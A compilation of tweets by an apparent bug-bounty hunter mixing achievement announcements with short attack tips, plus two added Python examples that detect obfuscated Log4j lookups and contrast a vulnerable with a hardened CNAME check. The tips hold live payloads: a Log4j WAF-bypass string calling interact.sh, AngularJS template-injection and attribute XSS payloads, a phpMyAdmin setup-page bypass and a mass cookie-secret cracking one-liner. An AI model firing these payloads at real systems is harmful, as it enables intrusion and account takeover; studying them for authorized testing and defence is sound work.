The team at @OpenAI just fixed a critical account takeover vulnerability I reported a few hours ago affecting #ChatGPT.
It was possible to take over someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇

Today I start a $50,000 bounties in 50 days #BugBounty challenge; I've been super unproductive lately with an average of 2 hacking hours a week.
Will update the thread occasionally with my progress - everyone welcome to follow aboard, and excited to be back at it.

Excited to announce that I just hit the $1,000,000 mark in bounties earned on @Hacker0x01!
It's been an incredible journey traveling around the world to compete and collaborate with the best.
Grateful for the opportunity and excited to see what the future holds! #BugBounty

Ever find a phpMyAdmin login portal and default creds won't work?
Try to access the /phpmyadmin/setup/ endpoint and you might be presented with an authentication-bypassed configurable admin panel.
This got me a nice bounty on @Synack.
Ref:
#bugbountytips

When fuzzing for SQLi always try "%22" as an injection payload; I just stumbled upon a MariaDB fork that wouldn't show any verbose SQL errors otherwise.
' => 301
" => 301
=> 301 with SQL error
#bugbountytips

How to effectively study and get better doing #BugBounty:
A. Create a private GitHub repository
B. Start a clean
C. Keep up with Hacktivity / Twitter / YouTube
D. Write notes (without copy-pasting)
I've been doing it for over 2 years and the ROI is amazing.

The damage of VDP programs and their incentivization is far greater than giving some hunters "points" for farming non-bugs that they can later boast about on their CVs; I believe it might actually ruin Bug Bounty platforms in the near future. Let's explore the facts 📜
So VDPs, as

We have successfully managed to replicate and confirm the public PoC for CVE-2022-40684, which grants SSH access without any interaction to vulnerable FortiOS instances, with a CVSS score of 9.6.
Nuclei template for scanning can be found here:
#BugBounty

Working AWS/CloudFront #log4j WAF bypass within the URI path:
http://hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}
Please note that AWS WAF is self-configurable, but I got hits on ~100 websites today with this payload.
#BugBounty

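The payload above evades naive `jndi:` string matching because Log4j expands nested `${...}` lookups innermost-first and substitutes the `:-` default value for any unresolvable key. A detector or WAF rule has to apply the same normalization before matching. The following is an added example (not code from the tweet or from any WAF vendor) that models that expansion step and runs it over constructed log lines, the first carrying the tweet's URI path:

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: a body with no further $, { or } inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")

def resolve(body: str, findings: List[str]) -> str:
    """Model the part of Log4j 2's StrSubstitutor the payload abuses:
    ${key:-default} yields 'default' when 'key' is not a resolvable lookup
    (so ${nagli:-:} -> ':' and ${::-/} -> '/'). A jndi lookup is recorded.
    Any other lookup (hostName, env, ...) becomes <key> so that the
    enclosing ${...} can still collapse on the next pass."""
    key, _, default = body.partition(":-")
    name = key.partition(":")[0].strip().lower()
    if name == "jndi":
        findings.append(body)
        return "<jndi>"
    return default if ":-" in body else "<" + key + ">"

def find_jndi(text: str, max_rounds: int = 16) -> Tuple[str, List[str]]:
    """Collapse nested lookups innermost-first until the text stops changing;
    return the normalized text plus every jndi lookup body that surfaced."""
    findings: List[str] = []
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: resolve(m.group(1), findings), text)
        if new == text:
            break
        text = new
    return text, findings

# Constructed sample access-log request lines (not from the original post);
# the first carries the URI path from the tweet above.
SAMPLE_LINES = [
    "GET /${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}} HTTP/1.1",
    "GET /search?q=${price} HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (line, jndi bodies) for every line hiding a jndi lookup."""
    hits = []
    for line in lines:
        _, found = find_jndi(line)
        if found:
            hits.append((line, found))
    return hits

if __name__ == "__main__":
    for line, found in scan(SAMPLE_LINES):
        print("jndi lookup after normalization:", found, "<-", line)
```

The first sample line normalizes to `${jndi:ldap://<hostName>.anything.interact.sh/a}` before the `jndi` key is visible, which is exactly the step a pattern-only rule skips.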
Poisoning your Cache for 1000$ - Approach to Exploitation
New blog post about a recent Web Cache Poisoning bug I have found on a private Bug Bounty program, going over the approach, exploitation and writing a reproducible report.
#bugbountytips #BugBounty

Decided to create "BountyTricks", a repo with private modules and bounty-related tricks I'll add from time to time, starting with a fresh nuclei SSRF module which takes endpoints as input and checks if they are vulnerable to SSRF - at scale.
#bugbountytips

Just got awarded the prestigious P1 Warrior Belt by @Bugcrowd for submitting over 100 valid critical submissions to companies on their platform, manually and using an automation engine.
Among the companies that I worked with to remediate critical,

AI helps greatly in translating JavaScript to "Human Readable Language"; here's how I found a very straightforward DOM-based XSS in 2 minutes.
#BugBounty

There are more than 17k publicly accessible Metabase instances on Shodan and a few BB programs that were affected as well; the fix is super easy for CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly : )
#bugbounty

Curious about what a $20,000 OAuth bug I discovered at a Live Hacking Event last year looks like? Today you can dive into an exact replica and see for yourself!
I've collaborated with @NahamSec & @hackinghub_io to create a walkthrough video + demo lab 🧪

Enjoying a champagne at the Grand Hyatt 🇭🇰 lounge and getting a collaboration invite from @fransrosen on Sunday?
That's what dreams are made of 😅
Looking forward to catching up with folks next week in Poland ✈️
#BugBounty

One-liner to mass scan for CookieMonster issues:
echo "host" | nuclei -t cookie-extractor.yaml | cut -d "=" -f 2 | cut -d ";" -f 1 > cookies && for cookie in $(cat cookies); do ./cookiemonster -cookie $cookie; done
#bugbountytips

Excited to share a small thing I've been working on: fast tooling for detecting misconfigured session implementations in web apps.
CookieMonster rapidly finds misconfigured secret keys in applications using Laravel, Flask, JWTs, and more!

In April, I submitted 173 vulnerabilities to 56 programs on @Hacker0x01, and also managed to sneak for the first time into the Top 3 global monthly leaderboard 🤙
#BugBounty

Less than 48 hours into @OpenAI's #BugBounty program on @Bugcrowd and already claimed the #1 spot among 1,000+ researchers by reporting 9 valid vulnerabilities! (so far)
The program got itself a strong start, and I thought I'd share some interesting insights I've noticed:
1/n

Ever find an endpoint which will let you control the contents inside a stored <img src> tag?
As XSS probably won't be possible, you can insert your Burp Collaborator and look for any referral leakages on the page (via the URI).
Escalated it to a 0-interaction ATO.
#bugbountytips

Super excited to have won the Exterminator award for the second time in a row at @Hacker0x01's H1-213 Live Hacking Event, while hacking @amazon and achieving another Top-5 finish.
Shout-out to @seanmeals and @fransrosen for the great collaboration and good time!
#BugBounty

Finding postMessage vulnerabilities has never been easier; take a look at our first open-source tool from @enso_security, which provides a GUI and cross-origin traffic inspector with ease.
Looking forward to seeing your findings using posta!
#bugbountytips

Cross-document messaging is a very common communication method. It has been around for a while,
Watch Enso's Chief Architect Chen Gour-Arie and Lior Mazor, Information Security at Amdocs, discuss cross-document messaging technology, and how to hack it!

Expand your attack surface by grabbing SSL certificates from IP addresses, and match these with your Bug Bounty targets.
I'd recommend running this technique on cloud provider ranges such as AWS/Azure/GCP using cero [CIDR] (cero 0.0.0.0/0)
#bugbountytips

I've earned more than 5-figure bounties from sensitive links, sent via email, that were leaked without any user interaction. Surprisingly, the leaks came from the very security vendors that were supposed to protect the victims.
Curious how this happens? 👇
#BugBounty

I am thrilled to announce that as of today, I have been ranked among the top 10 hackers on the all-time global leaderboard of @Hacker0x01!
2 years since I scored my first bounty payout.
#BugBounty

I just found a Critical Authentication Bypass on one of my target's Apache Tomcat instances.
-> redirect (NXDOMAIN)
-> 401 Basic Auth
-> 200 OK
#bugbountytips

The new @Grafana CVE-2022-21703 is actually a 1-click Authentication Bypass and full-read SSRF via CSRF; all you need is XSS/TKO on a same-site host and the CVSS bumps to 9.3 - Critical.
All @Grafana versions are VULNERABLE 🙃
Read more at
#BugBounty

Classic, just got scammed by @trondao's bug bounty program: they leaked their production () AWS keys, had access to their secrets, the team fixed it in an hour and marked it Informative - saying there is no risk.

Found a posting feature on a fairly new subdomain, running AngularJS 1.7.9:
{{ 7 * 7 }} -> 49
{{constructor.constructor('alert(1)')()}} -> Stored XSS
Neither HTML payloads nor normal XSS payloads worked; whenever you find an AngularJS instance, test for possible CSTIs.
#bugbountytips

Excited to finish this year as the 5th hacker in the world for 2021 at @Hacker0x01!
A huge achievement for me which involved consistent grind along with hard work, and one that I will cherish for a long time.
#BugBounty

Following @zseano's talk on #NahamCon2021, I have decided to share my already crafted research on the entire Google TLD domains scraped from OSINT sources; everything on the Trello board is in GoogleVRP scope.
Go crash it!
#BugBountyTips #BugBounty

Happy to share my latest writeup about a Critical issue I have found on *.samsung.com 👻
Broken Access Control leads to Mass Account Takeover of Samsung employees' application accounts
#bugbountytips #bugbounty

My #BugBounty2021Goals are:
- $20k in bounties
- 3000 reputation on H1
- Attending a LHE/CON abroad
- 1 valid submission on Facebook and Twitter
- Tools and framework development for automation
#BugBounty

Non-intrusive @pdnuclei template for the Confluence RCE vulnerability CVE-2022-26134 is available.
Confirmation of hits by DNS callbacks with nslookup to interactsh servers.

Happy to share some exciting news, as I've decided to leave my role at @salesforce in order to pursue my own Application Security B2B startup @shockwave_sec, which will wrap up my own automation from the last couple of years into a product offering.

Setup is ready for @Bugcrowd's #BugBash events and I'm already a few P1s in 🤙. I'll be in Vegas from the 6th to the 15th for some on-site hacking and collaborations, chilling, poker and hanging out with friends - looking forward to it!
🌴💻

Had some fun the last couple of hours 🧙🏻‍♂️
19:01 GMT+2 - New Scope Added
20:05 GMT+2 - 4th Critical Submitted
20:07 GMT+2 - New Scope is Out of Scope
00:20 GMT+2 - $8,000 Bounties
#BugBounty

When you find an input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work
"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works
#bugbountytips #BugBounty

Excited to finally cross the 40,000 reputation points mark on @HackerOne with 2x $5,000 bounties for RCEs; this time it was directly streamlined from , grateful to see the hard work paying off!
#BugBounty

It's been a blast participating at @Meta's Live Hacking Event; super hardened target but happy to score $17,000 with a pretty cool 0-day in collaboration with @spaceraccoonsec @0xteknogeek - Seoul 🇰🇷 is awesome and looking forward to the next challenges!
#BugBounty

I earned $800 for my submission on @bugcrowd #ItTakesACrowd
Stored XSS through a 3rd-party vendor; soon I'll be releasing my first research paper and slides talk about attacking 3rd parties to score bounties, stay tuned :-)
#BugBounty

Touched down at Denver a few hours ago after a 20-hour trip for #h1303, which is my first @Hacker0x01 in-person Live Hacking Event.
I'll share the experiences and stuff I'm up to until Monday in this long Twitter thread. It's going to be a 🚀
#BugBounty

Decided to drop the new Freshdesk subdomain TKO PoC.
We can take over any expired Freshdesk subdomain by performing response manipulation on the admin portal, as the CNAME validation is being handled only on the client side.
#bugbounty #bugbountytips

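The root cause above is a trust boundary mistake: the browser decides whether the CNAME check passed, so the server accepts whatever the tampered response says. As an added example (not Freshdesk's code and not from the tweet), here is the vulnerable binding pattern beside a hardened version in which the server resolves the CNAME itself, requires it to point at the requesting tenant's own portal host, and refuses domains already bound to someone else. The portal suffix, tenant names and the DNS view are constructed placeholders; in production the resolver would be a real CNAME query.

```python
from typing import Callable, Dict, Optional

# Assumed vendor portal suffix (placeholder, not Freshdesk's real one).
PORTAL_SUFFIX = ".example-helpdesk.net"
Resolver = Callable[[str], Optional[str]]   # domain -> CNAME target, or None

def bind_domain_vulnerable(req: dict, tenant: str, registry: Dict[str, str]) -> bool:
    """The pattern described in the post: the browser performs the CNAME check
    and tells the server whether it passed, so a tampered response/request with
    cname_verified=true binds any domain, including an expired tenant's."""
    if req.get("cname_verified") is True:
        registry[req["domain"]] = tenant
        return True
    return False

def bind_domain_hardened(domain: str, tenant: str, resolve_cname: Resolver,
                         registry: Dict[str, str]) -> bool:
    """Server-side check: resolve the CNAME on the server, require it to point
    at the requesting tenant's own portal host (not just any vendor host), and
    refuse a domain that is already bound to a different tenant."""
    domain = domain.rstrip(".").lower()
    target = resolve_cname(domain)
    if target is None:
        return False
    if target.rstrip(".").lower() != tenant.lower() + PORTAL_SUFFIX:
        return False
    if registry.get(domain) not in (None, tenant):
        return False
    registry[domain] = tenant
    return True

# Constructed DNS view standing in for a real resolver; help.acme-example.com
# is delegated to the tenant "acme" via CNAME.
FAKE_DNS = {"help.acme-example.com": "acme.example-helpdesk.net."}

def fake_resolve(domain: str) -> Optional[str]:
    return FAKE_DNS.get(domain)

if __name__ == "__main__":
    vuln: Dict[str, str] = {}
    print("vulnerable, other tenant claims domain:",
          bind_domain_vulnerable({"domain": "help.acme-example.com",
                                  "cname_verified": True}, "mallory", vuln))
    hard: Dict[str, str] = {}
    print("hardened, other tenant claims domain:",
          bind_domain_hardened("help.acme-example.com", "mallory", fake_resolve, hard))
    print("hardened, owner claims domain:",
          bind_domain_hardened("help.acme-example.com", "acme", fake_resolve, hard))
```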
Excited to score a Top 5 finish on H1-3493 🙌🏻
Without many expectations, this turned out to be my best performance on a @Hacker0x01 Live Hacking Event!
Thankful to anyone who took part in this awesome experience
#BugBounty

There is lately a huge "blind following" of a certain BB personality; it will lead beginners down a wrong path when they opt to start doing Bug Bounties.
I made the same mistakes and luckily I surrounded myself with a great list of BB hunters; I'll create a nice thread of genuine people.

Celebrating my 25th birthday today, reflecting on what has been a fantastic week in Dubai for @GISECGlobal - it's always great to meet and hang out with awesome hackers and friends around the world 🫡
#BugBounty

Recently, I faced numerous challenges where I needed to bypass limited SSRF or overcome regex mitigations to increase impact and make a case for a report.
Spinning up a server to host a redirection header is time-consuming and not-so-fun to do.
There's an easy alternative 🧵

Happy to sneak into the Top 10 on the 90-day leaderboard at @Hacker0x01, 0 VDP reputation involved - the result of hard work and many invested hours.
Today marks exactly 11 months since my first bounty.
#BugBounty

The Polyfill[.]io backdoor is wild! From what I read all over Twitter, the person who was in charge of the domain sold it to rogue actors back in February and ever since it served as a backdoor to hundreds of thousands of major websites that had it referenced within a script tag,

Thanks for tuning in to my @defcon session and sorry for any possible sound issues.
You can find the talk here:
SAP NetWeaver Open Redirect:
Slides are on the first comment.
You can reach out to me for Q&A about the session :)

Thanks @SynackRedTeam for a great event today at Vegas; it was great to meet good pals in person and chat around 👋
Looking forward to @defcon tomorrow
#BugBounty

Expanding your attack surface with hardcoded APK endpoints sounds like a tough task, but it's simple and rewarding:
1. Install by @delphit33
2. Download the target's APK with a simple Google search
3. apkurlgrep -a target.apk
Win.
#bugbountytips #BugBounty

Just scooped a very nice bounty and big kudos to @elastic's Bug Bounty Team 👌🏻
Submission => Triage => Fix => Bounty in 4 days; definitely a program I'd recommend playing with at @Hacker0x01
#BugBounty

I have a theory that the number of people who actually hack full time on a specific public program is < 10 - meaning that there should be a ton of bugs out there to find.
I'm 100% certain that if anyone would focus on one for 30 days he would get a valid bug.
#bugbountytips

The new @Hacker0x01 policy around CVE reports is concerning, especially for High & Critical ones, as it potentially keeps hundreds of their customers vulnerable to critical ransomware-leading risks by withholding information, as they are automatically being set as "Informative."

#1 secret for being a good #BugBounty hunter: create a community of like-minded people to share your progress with.
Since June 2021 I've been engaging a few hours on a daily basis with ~50 top-tier hackers and we all learn every day, have fun together and earn WAY more bounties.

Some VPS advice for new hackers:
You will be fine working on single targets with $5 DO boxes.
If you want to up your automation game, you'll figure out when is the right time to upgrade.
There is 0 logic in renting shared instances or starting out with a stronger setup.
#bugbountytips

Thrilled to scoop another Top 5 finish on @Hacker0x01's H1-813 Live Hacking Event in Tokyo 🇯🇵 targeting @PayPal, earning more than $30,000 in bounties!
#BugBounty

This is a small example of how I like to structure my private repo:
I already have over 30+ chapters and 20k+ lines; that is the best way I found to consume knowledge and build a private handbook for bug bounty sessions.

Excited to invite you all to join my @defcon session airing at on 11:00 AM GMT-8.
We'll go over some reconnaissance concepts, how to scan for bugs at scale and some practical PoCs with a new nuclei templates release.
#defcon29 #BugBounty

Team Israel 🇮🇱 finished 2nd on @Hacker0x01's 2023 Ambassador World Cup, beating 🇮🇳🇺🇸🇹🇷🇸🇬🇫🇷 along the way!
Circumstances were tough but we gave a proper fight - kudos to the team for all the hard work; looking forward to the next one and to better times ahead 🙏
#BugBounty